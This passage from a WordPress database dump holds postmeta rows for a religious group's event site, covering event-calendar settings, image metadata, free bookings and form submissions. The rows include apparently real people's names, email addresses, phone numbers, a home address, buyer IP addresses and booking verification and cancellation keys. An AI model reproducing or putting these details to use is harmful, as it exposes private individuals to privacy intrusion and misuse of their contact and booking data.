lease verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(189633,268876,'passster_activate_global_protection',''),(189634,268876,'passster_activate_protection',''),(189635,268876,'passster_protection_type','password'),(189636,268876,'_wp_old_date','2022-01-18'),(189637,268876,'boldgrid_in_page_containers','1'),(189652,268876,'_dp_original','268874'),(189639,268876,'_oembed_feb482e9f1973a04e96ed04d346ebf98','{{unknown}}'),(189640,268876,'passster_area_shortcode',''),(189641,268876,'mec_cost_auto_calculate','0'),(189642,268876,'mec_style_per_event','global'),(189643,268876,'mec_trailer_url',''),(189644,268876,'mec_trailer_title',''),(189645,268876,'mec_start_datetime','2023-08-17 07:00 PM'),(189646,268876,'mec_end_datetime','2023-08-17 08:00 PM'),(189647,268876,'mec_sequence','8'),(189648,268876,'mec_event_gallery','a:0:{}'),(189649,268876,'mec_related_events','a:0:{}'),(189650,268876,'mec_banner','a:0:{}'),(189651,268876,'_thumbnail_id','268877'),(189653,268876,'_edit_lock','1691156079:15'),(189654,268876,'_edit_last','15'),(189655,268877,'_wp_attached_file','2023/08/GoldenArches.webp'),(189656,268877,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:25:\"2023/08/GoldenArches.webp\";s:8:\"filesize\";i:30506;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"GoldenArches-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9534;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"GoldenArches-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3212;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"GoldenArches-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:7874;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"GoldenArches-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18710;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"GoldenArches-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14638;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"GoldenArches-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11368;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"GoldenArches-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9198;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191352,268981,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:592;s:6:\"height\";i:241;s:4:\"file\";s:20:\"2023/09/image-2.webp\";s:8:\"filesize\";i:4190;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"image-2-350x142.webp\";s:5:\"width\";i:350;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6452;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"image-2-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2446;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"image-2-300x241.webp\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2116;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:20:\"image-2-500x241.webp\";s:5:\"width\";i:500;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3728;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"image-2-474x241.webp\";s:5:\"width\";i:474;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3386;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"image-2-391x241.webp\";s:5:\"width\";i:391;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2690;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"image-2-300x241.webp\";s:5:\"width\";i:300;s:6:\"height\";i:241;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:2116;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191351,268981,'_wp_attached_file','2023/09/image-2.webp'),(191348,268979,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:798;s:6:\"height\";i:501;s:4:\"file\";s:20:\"2023/09/image-1.webp\";s:8:\"filesize\";i:15440;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"image-1-312x196.webp\";s:5:\"width\";i:312;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11284;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"image-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4760;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"image-1-768x482.webp\";s:5:\"width\";i:768;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:38968;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:20:\"image-1-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12450;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:20:\"image-1-500x500.webp\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24032;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:20:\"image-1-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22452;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:20:\"image-1-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16866;}s:8:\"tileview\";a:5:{s:4:\"file\";s:20:\"image-1-300x400.webp\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13578;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193270,269166,'_form_id','61'),(193269,269166,'_field_649',''),(191340,268978,'_field_133','Tim'),(191341,268978,'_field_134','Kuss'),(191342,268978,'_field_135','tim_02701@protonmail.com'),(191343,268978,'_field_137','New Email Address'),(191344,268978,'_field_138','Trying again to receive emails. Have NOT received any for many months. Thank you for trying again.'),(191345,268978,'_form_id','13'),(191346,268978,'_seq_num','145'),(191347,268979,'_wp_attached_file','2023/09/image-1.webp'),(193271,269166,'_seq_num','35'),(193268,269166,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(193267,269166,'_field_651','(303) 408-1032'),(193265,269166,'_field_652','Breeden'),(193266,269166,'_field_653','txbreedtv@gmail.com'),(193264,269166,'_field_654','Tom'),(193263,269165,'_seq_num','34'),(193259,269165,'_field_651','(303) 408-1033'),(193260,269165,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(193261,269165,'_field_649',''),(193262,269165,'_form_id','61'),(193258,269165,'_field_653','andrea.jennison@gmail.com'),(193256,269165,'_field_654','Andrea'),(193257,269165,'_field_652','Jennison'),(191326,72635,'passster_area_shortcode',''),(189741,268880,'protect_children',''),(189742,268880,'mec_color',''),(189743,268880,'mec_location_id','132'),(189744,268880,'mec_dont_show_map','0'),(189745,268880,'mec_organizer_id','1'),(189746,268880,'mec_read_more',''),(189747,268880,'mec_more_info',''),(189748,268880,'mec_more_info_title',''),(189749,268880,'mec_more_info_target','_self'),(189750,268880,'mec_cost',''),(189751,268880,'mec_currency','a:0:{}'),(189752,268880,'mec_additional_organizer_ids','a:0:{}'),(189753,268880,'mec_additional_location_ids','a:0:{}'),(189754,268880,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-08-13\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(189755,268880,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(189756,268880,'mec_certain_weekdays','a:0:{}'),(189757,268880,'mec_allday','0'),(189758,268880,'one_occurrence','0'),(189759,268880,'mec_hide_time','0'),(189760,268880,'mec_hide_end_time','0'),(189761,268880,'mec_comment',''),(189762,268880,'mec_timezone','global'),(189763,268880,'mec_countdown_method','global'),(189764,268880,'mec_public','1'),(189765,268880,'mec_start_date','2023-08-13'),(189766,268880,'mec_start_time_hour','2'),(189767,268880,'mec_start_time_minutes','0'),(189768,268880,'mec_start_time_ampm','PM'),(189769,268880,'mec_start_day_seconds','50400'),(189770,268880,'mec_end_date','2023-08-13'),(189771,268880,'mec_end_time_hour','3'),(189772,268880,'mec_end_time_minutes','30'),(189773,268880,'mec_end_time_ampm','PM'),(189774,268880,'mec_end_day_seconds','55800'),(189775,268880,'mec_repeat_status','0'),(189776,268880,'mec_repeat_type',''),(189777,268880,'mec_repeat_interval','1'),(189778,268880,'mec_repeat_end',''),(189779,268880,'mec_repeat_end_at_occurrences',''),(189780,268880,'mec_repeat_end_at_date',''),(189781,268880,'mec_advanced_days','a:0:{}'),(189782,268880,'mec_in_days',''),(189783,268880,'mec_not_in_days',''),(189784,268880,'mec_hourly_schedules','a:0:{}'),(189785,268880,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(189786,268880,'mec_tickets','a:0:{}'),(189787,268880,'mec_fees_global_inheritance','1'),(189788,268880,'mec_fees','a:0:{}'),(189789,268880,'mec_ticket_variations_global_inheritance','1'),(189790,268880,'mec_ticket_variations','a:0:{}'),(189791,268880,'mec_reg_fields_global_inheritance','1'),(189792,268880,'mec_reg_fields','a:0:{}'),(189793,268880,'mec_bfixed_fields','a:0:{}'),(189794,268880,'mec_op','a:0:{}'),(189795,268880,'mec_fields','a:0:{}'),(189796,268880,'mec_event_status','EventScheduled'),(189797,268880,'mec_moved_online_link',''),(189798,268880,'mec_cancelled_reason',''),(189799,268880,'mec_display_cancellation_reason_in_single_page',''),(189800,268880,'boldgrid_hide_page_title','0'),(189801,268880,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(189802,268880,'passster_activate_global_protection',''),(189803,268880,'passster_activate_protection',''),(189804,268880,'passster_protection_type','password'),(189805,268880,'boldgrid_in_page_containers','1'),(189806,268880,'passster_area_shortcode',''),(189807,268880,'_wp_old_date','2023-01-14'),(189808,268880,'mec_cost_auto_calculate','0'),(189809,268880,'mec_style_per_event','global'),(189810,268880,'mec_trailer_url',''),(189811,268880,'mec_trailer_title',''),(189812,268880,'mec_start_datetime','2023-08-13 02:00 PM'),(189813,268880,'mec_end_datetime','2023-08-13 03:30 PM'),(189814,268880,'mec_sequence','4'),(189815,268880,'mec_event_gallery','a:0:{}'),(189816,268880,'mec_related_events','a:0:{}'),(189817,268880,'mec_banner','a:0:{}'),(189818,268880,'_thumbnail_id','268483'),(189819,268880,'_dp_original','268765'),(189820,268880,'_edit_lock','1691156839:15'),(189821,268880,'_edit_last','15'),(189822,268884,'_field_224','Lisa'),(189823,268884,'_field_225','Gage'),(189824,268884,'_field_226','Lisa1lg3@gmail.com'),(189825,268884,'_field_227','CO'),(189826,268884,'_field_228','US'),(189827,268884,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(189828,268884,'_form_id','21'),(189829,268884,'_seq_num','181'),(189830,268885,'_field_224','Catherine'),(189831,268885,'_field_225','VonRiesen'),(189832,268885,'_field_226','catvon39@yahoo.com'),(189833,268885,'_field_227','WY'),(189834,268885,'_field_228','US'),(189835,268885,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(189836,268885,'_form_id','21'),(189837,268885,'_seq_num','182'),(189838,268887,'mec_transaction_id','EYV69962'),(189839,268887,'mec_gateway','MEC_gateway_free'),(189840,268887,'mec_gateway_label','Free'),(189841,268887,'mec_user_id','1000091'),(189842,268887,'mec_verified','1'),(189843,268887,'mec_verification_key','73b7a097384d3b376f0115635446df73'),(189844,268887,'mec_cancellation_key','686a10e8109cdac681d1fbe7c9326533'),(189845,268887,'mec_confirmed','1'),(189846,268887,'mec_event_id','268863'),(189847,268887,'mec_date','1691922600:1691926200'),(189848,268887,'mec_ticket_id',',1,'),(189849,268887,'mec_booking_time','2023-08-09 20:42:03'),(189850,268887,'mec_all_dates','a:0:{}'),(189851,268887,'mec_other_dates','a:0:{}'),(189852,268887,'mec_attention_time','1691922600:1691926200'),(189853,268887,'mec_attention_time_start','1691922600'),(189854,268887,'mec_attention_time_end','1691926200'),(189855,268887,'mec_book_date_submit','20230809204203'),(189856,268887,'mec_booking_location','129'),(189857,268887,'mec_ticket_price_1','0'),(189858,268887,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:27:\"marlenechapelle88@gmail.com\";s:4:\"name\";s:16:\"Marlene Chapelle\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"208.114.129.9\";}}'),(189859,268887,'mec_price','0'),(189860,268887,'mec_payable','0'),(189861,268887,'mec_local_timezone','America/Toronto'),(189862,268888,'_field_224','Irina'),(189863,268888,'_field_225','V'),(189864,268888,'_field_226','ruslauritta@hotmail.com'),(189865,268888,'_field_227','CO'),(189866,268888,'_field_228','US'),(189867,268888,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(189868,268888,'_form_id','21'),(189869,268888,'_seq_num','183'),(189870,268889,'_field_133','howard'),(189871,268889,'_field_134','hancock'),(189872,268889,'_field_135','h.hancock@apex.net'),(189873,268889,'_field_137','Would You Be Ready?'),(189874,268889,'_field_138','Would You Be Ready?\nby Pastor Greg Laurie \n\n“No one knows the day or hour when these things will happen, not even the angels in heaven or the Son himself. Only the Father knows.”\n—Matthew 24:36\n\nPeriodically, people come along who say they’ve cracked the code and know when Jesus is returning. They claim to know when the Rapture will take place.\n\nHowever, Jesus said, “No one knows the day or hour when these things will happen, not even the angels in heaven or the Son himself. Only the Father knows” (Matthew 24:36 NLT). So what this actually means is that no one knows the day or the hour.\n\nBut there’s a difference between the Rapture and the Second Coming. The Rapture, which could happen at any moment, is when Jesus returns for His people. The Second Coming, on the other hand, is when He returns with His people.\n\nThe Rapture will take place before the appearance of the Antichrist and the Tribulation. The Second Coming will take place at the end of the Tribulation, after the seven-year reign of the Antichrist and after the Battle of Armageddon.\n\nSo we know in sequence when the Second Coming will occur, but the Rapture could happen at any moment. Only God knows when that will be, and it will take place at the right moment. But it will happen, and it will be one of the greatest events in history.\n\nI want to ask you: Will you be ready for that day?\n\nJesus said, “Two men will be working together in the field; one will be taken, the other left. Two women will be grinding flour at the mill; one will be taken, the other left” (Matthew 24:40–41 NLT). This tells us it’s a global event in which people are caught up to meet the Lord.\n\nThe Rapture could happen in our lifetime. It could happen today. If Christ were to come back now, would you be ready? Don’t miss the opportunity to get right with God.\n'),(189875,268889,'_form_id','13'),(189876,268889,'_seq_num','139'),(189877,268890,'mec_transaction_id','OFC52366'),(189878,268890,'mec_gateway','MEC_gateway_free'),(189879,268890,'mec_gateway_label','Free'),(189880,268890,'mec_user_id','1000081'),(189881,268890,'mec_verified','1'),(189882,268890,'mec_verification_key','9303724bff9224ea32a283d748e7d53e'),(189883,268890,'mec_cancellation_key','8dd961f2cc877e1c049c2971a782c758'),(189884,268890,'mec_confirmed','1'),(189885,268890,'mec_event_id','268863'),(189886,268890,'mec_date','1691922600:1691926200'),(189887,268890,'mec_ticket_id',',1,'),(189888,268890,'mec_booking_time','2023-08-13 08:09:49'),(189889,268890,'mec_all_dates','a:0:{}'),(189890,268890,'mec_other_dates','a:0:{}'),(189891,268890,'mec_attention_time','1691922600:1691926200'),(189892,268890,'mec_attention_time_start','1691922600'),(189893,268890,'mec_attention_time_end','1691926200'),(189894,268890,'mec_book_date_submit','20230813080949'),(189895,268890,'mec_booking_location','129'),(189896,268890,'mec_ticket_price_1','0'),(189897,268890,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"174.238.225.233\";}}'),(189898,268890,'mec_price','0'),(189899,268890,'mec_payable','0'),(189900,268890,'mec_local_timezone','America/Phoenix'),(189901,268891,'mec_transaction_id','MAD42041'),(189902,268891,'mec_gateway','MEC_gateway_free'),(189903,268891,'mec_gateway_label','Free'),(189904,268891,'mec_user_id','1000003'),(189905,268891,'mec_verified','1'),(189906,268891,'mec_verification_key','a063a3c2d51e469b0baacf3186813b18'),(189907,268891,'mec_cancellation_key','2c0b8e521d417cb830e364c6e83d6b5e'),(189908,268891,'mec_confirmed','1'),(189909,268891,'mec_event_id','268863'),(189910,268891,'mec_date','1691922600:1691926200'),(189911,268891,'mec_ticket_id',',1,'),(189912,268891,'mec_booking_time','2023-08-13 10:55:34'),(189913,268891,'mec_all_dates','a:0:{}'),(189914,268891,'mec_other_dates','a:0:{}'),(189915,268891,'mec_attention_time','1691922600:1691926200'),(189916,268891,'mec_attention_time_start','1691922600'),(189917,268891,'mec_attention_time_end','1691926200'),(189918,268891,'mec_book_date_submit','20230813105534'),(189919,268891,'mec_booking_location','129'),(189920,268891,'mec_ticket_price_1','0'),(189921,268891,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"sue2earth@msn.com\";s:4:\"name\";s:12:\"Susan Haebig\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"96.60.41.70\";}}'),(189922,268891,'mec_price','0'),(189923,268891,'mec_payable','0'),(189924,268891,'mec_local_timezone','America/Chicago'),(189925,268892,'_field_30','Michael'),(189926,268892,'_field_31','Merriman'),(189927,268892,'_field_32','(303) 589-2364'),(189928,268892,'_field_33','stoney.merriman@gmail.com'),(189929,268892,'_field_34','553 28 Rd'),(189930,268892,'_field_35','Grand Junction'),(189931,268892,'_field_36','CO'),(189932,268892,'_field_37','US'),(189933,268892,'_field_39',''),(189934,268892,'_form_id','4'),(189935,268892,'_seq_num','35'),(193886,269229,'_field_651','(765) 714-0163'),(193887,269229,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom'),(193880,269228,'_field_649',''),(193881,269228,'_form_id','61'),(193882,269228,'_seq_num','83'),(189990,268904,'_edit_lock','1692465996:2'),(189991,268904,'_edit_last','15'),(189992,268904,'_has_fluentform','a:1:{i:5;s:1:\"5\";}'),(193864,269226,'_field_649',''),(193865,269226,'_form_id','61'),(193866,269226,'_seq_num','81'),(193867,269227,'_field_654','Linda'),(193868,269227,'_field_652','Johnson'),(193869,269227,'_field_653','creighlinda@bresnan.net'),(193851,269224,'_field_654','Ron'),(193852,269224,'_field_652','McCoy'),(193853,269224,'_field_653','mccoyrp@msn.com'),(190003,268904,'passster_area_shortcode',''),(190004,268904,'_wp_page_template','default'),(190005,268904,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(190006,268904,'boldgrid_hide_page_title','0'),(190007,268904,'protect_children',''),(190008,268904,'boldgrid_in_page_containers','1'),(190009,268904,'bgseo_robots_index','index'),(190010,268904,'bgseo_robots_follow','follow'),(193863,269226,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(193859,269226,'_field_654','Renee'),(190015,268912,'protect_children',''),(190016,268912,'mec_color',''),(190017,268912,'mec_location_id','149'),(190018,268912,'mec_dont_show_map','0'),(190019,268912,'mec_organizer_id','1'),(190020,268912,'mec_read_more',''),(190021,268912,'mec_more_info',''),(190022,268912,'mec_more_info_title',''),(190023,268912,'mec_more_info_target','_self'),(190024,268912,'mec_cost',''),(190025,268912,'mec_currency','a:0:{}'),(190026,268912,'mec_additional_organizer_ids','a:0:{}'),(190027,268912,'mec_additional_location_ids','a:0:{}'),(190028,268912,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-10\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(190029,268912,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(190030,268912,'mec_certain_weekdays','a:0:{}'),(190031,268912,'mec_allday','0'),(190032,268912,'one_occurrence','0'),(190033,268912,'mec_hide_time','0'),(190034,268912,'mec_hide_end_time','0'),(190035,268912,'mec_comment',''),(190036,268912,'mec_timezone','global'),(190037,268912,'mec_countdown_method','global'),(190038,268912,'mec_public','1'),(190039,268912,'mec_start_date','2023-09-09'),(190040,268912,'mec_start_time_hour','10'),(190041,268912,'mec_start_time_minutes','0'),(190042,268912,'mec_start_time_ampm','AM'),(190043,268912,'mec_start_day_seconds','36000'),(190044,268912,'mec_end_date','2023-09-10'),(190045,268912,'mec_end_time_hour','5'),(190046,268912,'mec_end_time_minutes','0'),(190047,268912,'mec_end_time_ampm','PM'),(190048,268912,'mec_end_day_seconds','61200'),(190049,268912,'mec_repeat_status','0'),(190050,268912,'mec_repeat_type',''),(190051,268912,'mec_repeat_interval','1'),(190052,268912,'mec_repeat_end',''),(190053,268912,'mec_repeat_end_at_occurrences',''),(190054,268912,'mec_repeat_end_at_date',''),(190055,268912,'mec_advanced_days','a:0:{}'),(190056,268912,'mec_in_days',''),(190057,268912,'mec_not_in_days',''),(190058,268912,'mec_hourly_schedules','a:0:{}'),(190059,268912,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(190060,268912,'mec_tickets','a:0:{}'),(190061,268912,'mec_fees_global_inheritance','1'),(190062,268912,'mec_fees','a:0:{